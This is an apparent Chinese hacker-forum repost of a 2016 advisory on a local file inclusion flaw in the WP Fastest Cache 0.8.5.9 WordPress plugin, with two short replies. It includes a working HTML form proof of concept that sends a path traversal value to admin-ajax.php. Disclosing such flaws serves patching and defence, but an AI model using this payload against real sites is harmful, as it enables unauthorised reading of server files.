WordPress WP Fastest Cache 0.8.5.9 文件包含漏洞

90_ 发表于 2016-7-13 17:30:52

WordPress WP Fastest Cache plugin version 0.8.5.9 suffers from a local file inclusion vulnerability.

<html>
<body>
   <form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpfc_cdn_template_ajax_request" />
      <input type="hidden" name="id" value="../exclude" />
      <input type="submit" />
   </form>
</body>
</html>

细草微风岸 发表于 2016-7-13 17:57:20

火钳留名~~~

Saber 发表于 2016-7-13 19:36:16

用了这个插件后无法访问不带www的域名

页: [1]

红客联盟 - 由08安全团队运营's Archiver

WordPress WP Fastest Cache 0.8.5.9 文件包含漏洞